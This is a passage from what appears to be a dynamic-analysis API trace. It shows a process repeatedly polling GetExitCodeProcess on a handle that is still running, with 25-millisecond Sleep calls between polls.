lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.977] Sleep (dwMilliseconds=0x19) [0285.013] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.013] Sleep (dwMilliseconds=0x19) [0285.047] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.047] Sleep (dwMilliseconds=0x19) [0285.101] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.101] Sleep (dwMilliseconds=0x19) [0285.136] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.136] Sleep (dwMilliseconds=0x19) [0285.171] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.171] Sleep (dwMilliseconds=0x19) [0285.206] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.206] Sleep (dwMilliseconds=0x19) [0285.248] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.248] Sleep (dwMilliseconds=0x19) [0285.318] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.318] Sleep (dwMilliseconds=0x19) [0285.353] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.353] Sleep (dwMilliseconds=0x19) [0285.388] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.388] Sleep (dwMilliseconds=0x19) [0285.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.441] Sleep (dwMilliseconds=0x19) [0285.504] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.504] Sleep (dwMilliseconds=0x19) [0285.586] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.586] Sleep (dwMilliseconds=0x19) [0285.639] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.639] Sleep (dwMilliseconds=0x19) [0285.682] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.682] Sleep (dwMilliseconds=0x19) [0285.742] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.742] Sleep (dwMilliseconds=0x19) [0285.813] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.813] Sleep (dwMilliseconds=0x19) [0285.858] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.858] Sleep (dwMilliseconds=0x19) [0285.896] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.896] Sleep (dwMilliseconds=0x19) [0285.930] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0285.930] Sleep (dwMilliseconds=0x19) [0286.597] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0286.597] Sleep (dwMilliseconds=0x19) [0286.634] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0286.634] Sleep (dwMilliseconds=0x19) [0286.688] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0286.688] Sleep (dwMilliseconds=0x19) [0286.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0286.726] Sleep (dwMilliseconds=0x19) [0286.760] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0286.760] Sleep (dwMilliseconds=0x19) [0286.794] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0286.794] Sleep (dwMilliseconds=0x19) [0286.988] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0286.988] Sleep (dwMilliseconds=0x19) [0287.124] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.124] Sleep (dwMilliseconds=0x19) [0287.212] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.212] Sleep (dwMilliseconds=0x19) [0287.266] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.266] Sleep (dwMilliseconds=0x19) [0287.301] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.301] Sleep (dwMilliseconds=0x19) [0287.378] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.379] Sleep (dwMilliseconds=0x19) [0287.420] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.420] Sleep (dwMilliseconds=0x19) [0287.467] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.467] Sleep (dwMilliseconds=0x19) [0287.501] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.501] Sleep (dwMilliseconds=0x19) [0287.598] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.598] Sleep (dwMilliseconds=0x19) [0287.660] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.660] Sleep (dwMilliseconds=0x19) [0287.703] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.703] Sleep (dwMilliseconds=0x19) [0287.736] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.736] Sleep (dwMilliseconds=0x19) [0287.816] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.816] Sleep (dwMilliseconds=0x19) [0287.863] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.863] Sleep (dwMilliseconds=0x19) [0287.952] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.952] Sleep (dwMilliseconds=0x19) [0287.987] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0287.987] Sleep (dwMilliseconds=0x19) [0288.029] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.030] Sleep (dwMilliseconds=0x19) [0288.065] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.065] Sleep (dwMilliseconds=0x19) [0288.137] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.137] Sleep (dwMilliseconds=0x19) [0288.193] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.193] Sleep (dwMilliseconds=0x19) [0288.234] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.234] Sleep (dwMilliseconds=0x19) [0288.269] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.269] Sleep (dwMilliseconds=0x19) [0288.367] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.367] Sleep (dwMilliseconds=0x19) [0288.401] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.401] Sleep (dwMilliseconds=0x19) [0288.449] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.449] Sleep (dwMilliseconds=0x19) [0288.486] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.486] Sleep (dwMilliseconds=0x19) [0288.520] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.520] Sleep (dwMilliseconds=0x19) [0288.554] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.554] Sleep (dwMilliseconds=0x19) [0288.598] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.598] Sleep (dwMilliseconds=0x19) [0288.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.633] Sleep (dwMilliseconds=0x19) [0288.667] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.667] Sleep (dwMilliseconds=0x19) [0288.702] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.702] Sleep (dwMilliseconds=0x19) [0288.736] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.736] Sleep (dwMilliseconds=0x19) [0288.770] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.770] Sleep (dwMilliseconds=0x19) [0288.810] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.810] Sleep (dwMilliseconds=0x19) [0288.844] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.844] Sleep (dwMilliseconds=0x19) [0288.895] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.895] Sleep (dwMilliseconds=0x19) [0288.950] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0288.950] Sleep (dwMilliseconds=0x19) [0289.072] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.072] Sleep (dwMilliseconds=0x19) [0289.178] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.178] Sleep (dwMilliseconds=0x19) [0289.297] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.297] Sleep (dwMilliseconds=0x19) [0289.415] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.415] Sleep (dwMilliseconds=0x19) [0289.486] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.486] Sleep (dwMilliseconds=0x19) [0289.539] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.539] Sleep (dwMilliseconds=0x19) [0289.574] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.574] Sleep (dwMilliseconds=0x19) [0289.625] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.625] Sleep (dwMilliseconds=0x19) [0289.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.666] Sleep (dwMilliseconds=0x19) [0289.702] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.702] Sleep (dwMilliseconds=0x19) [0289.737] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.737] Sleep (dwMilliseconds=0x19) [0289.771] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.771] Sleep (dwMilliseconds=0x19) [0289.808] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.808] Sleep (dwMilliseconds=0x19) [0289.864] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.864] Sleep (dwMilliseconds=0x19) [0289.907] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.907] Sleep (dwMilliseconds=0x19) [0289.948] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0289.948] Sleep (dwMilliseconds=0x19) [0290.018] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.018] Sleep (dwMilliseconds=0x19) [0290.054] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.054] Sleep (dwMilliseconds=0x19) [0290.091] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.092] Sleep (dwMilliseconds=0x19) [0290.128] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.128] Sleep (dwMilliseconds=0x19) [0290.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.205] Sleep (dwMilliseconds=0x19) [0290.243] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.244] Sleep (dwMilliseconds=0x19) [0290.286] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.286] Sleep (dwMilliseconds=0x19) [0290.320] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.321] Sleep (dwMilliseconds=0x19) [0290.388] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.388] Sleep (dwMilliseconds=0x19) [0290.435] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.435] Sleep (dwMilliseconds=0x19) [0290.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.469] Sleep (dwMilliseconds=0x19) [0290.550] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.550] Sleep (dwMilliseconds=0x19) [0290.620] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.621] Sleep (dwMilliseconds=0x19) [0290.656] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.656] Sleep (dwMilliseconds=0x19) [0290.718] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.718] Sleep (dwMilliseconds=0x19) [0290.752] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.752] Sleep (dwMilliseconds=0x19) [0290.786] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.786] Sleep (dwMilliseconds=0x19) [0290.833] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.833] Sleep (dwMilliseconds=0x19) [0290.866] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.866] Sleep (dwMilliseconds=0x19) [0290.901] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.901] Sleep (dwMilliseconds=0x19) [0290.936] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.936] Sleep (dwMilliseconds=0x19) [0290.982] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0290.982] Sleep (dwMilliseconds=0x19) [0291.053] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.053] Sleep (dwMilliseconds=0x19) [0291.087] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.087] Sleep (dwMilliseconds=0x19) [0291.133] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.133] Sleep (dwMilliseconds=0x19) [0291.169] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.169] Sleep (dwMilliseconds=0x19) [0291.203] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.203] Sleep (dwMilliseconds=0x19) [0291.238] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.238] Sleep (dwMilliseconds=0x19) [0291.276] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.276] Sleep (dwMilliseconds=0x19) [0291.313] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.313] Sleep (dwMilliseconds=0x19) [0291.388] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.388] Sleep (dwMilliseconds=0x19) [0291.426] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.426] Sleep (dwMilliseconds=0x19) [0291.462] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.462] Sleep (dwMilliseconds=0x19) [0291.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.502] Sleep (dwMilliseconds=0x19) [0291.536] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.536] Sleep (dwMilliseconds=0x19) [0291.570] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.570] Sleep (dwMilliseconds=0x19) [0291.609] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.610] Sleep (dwMilliseconds=0x19) [0291.648] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.648] Sleep (dwMilliseconds=0x19) [0291.683] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.683] Sleep (dwMilliseconds=0x19) [0291.752] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.752] Sleep (dwMilliseconds=0x19) [0291.788] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.789] Sleep (dwMilliseconds=0x19) [0291.826] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.826] Sleep (dwMilliseconds=0x19) [0291.873] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.873] Sleep (dwMilliseconds=0x19) [0291.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.909] Sleep (dwMilliseconds=0x19) [0291.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0291.945] Sleep (dwMilliseconds=0x19) [0292.045] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.046] Sleep (dwMilliseconds=0x19) [0292.188] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.188] Sleep (dwMilliseconds=0x19) [0292.235] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.235] Sleep (dwMilliseconds=0x19) [0292.262] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.262] Sleep (dwMilliseconds=0x19) [0292.291] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.291] Sleep (dwMilliseconds=0x19) [0292.321] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.321] Sleep (dwMilliseconds=0x19) [0292.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.403] Sleep (dwMilliseconds=0x19) [0292.428] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.429] Sleep (dwMilliseconds=0x19) [0292.459] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.459] Sleep (dwMilliseconds=0x19) [0292.485] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.485] Sleep (dwMilliseconds=0x19) [0292.518] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.519] Sleep (dwMilliseconds=0x19) [0292.554] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.555] Sleep (dwMilliseconds=0x19) [0292.581] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.581] Sleep (dwMilliseconds=0x19) [0292.623] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.623] Sleep (dwMilliseconds=0x19) [0292.651] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.651] Sleep (dwMilliseconds=0x19) [0292.678] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.678] Sleep (dwMilliseconds=0x19) [0292.703] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.704] Sleep (dwMilliseconds=0x19) [0292.733] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.733] Sleep (dwMilliseconds=0x19) [0292.761] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.762] Sleep (dwMilliseconds=0x19) [0292.790] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.790] Sleep (dwMilliseconds=0x19) [0292.816] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.816] Sleep (dwMilliseconds=0x19) [0292.843] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.843] Sleep (dwMilliseconds=0x19) [0292.871] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.872] Sleep (dwMilliseconds=0x19) [0292.965] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0292.965] Sleep (dwMilliseconds=0x19) [0293.017] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.017] Sleep (dwMilliseconds=0x19) [0293.059] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.059] Sleep (dwMilliseconds=0x19) [0293.085] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.085] Sleep (dwMilliseconds=0x19) [0293.113] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.114] Sleep (dwMilliseconds=0x19) [0293.142] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.142] Sleep (dwMilliseconds=0x19) [0293.183] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.183] Sleep (dwMilliseconds=0x19) [0293.217] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.218] Sleep (dwMilliseconds=0x19) [0293.244] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.244] Sleep (dwMilliseconds=0x19) [0293.270] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.270] Sleep 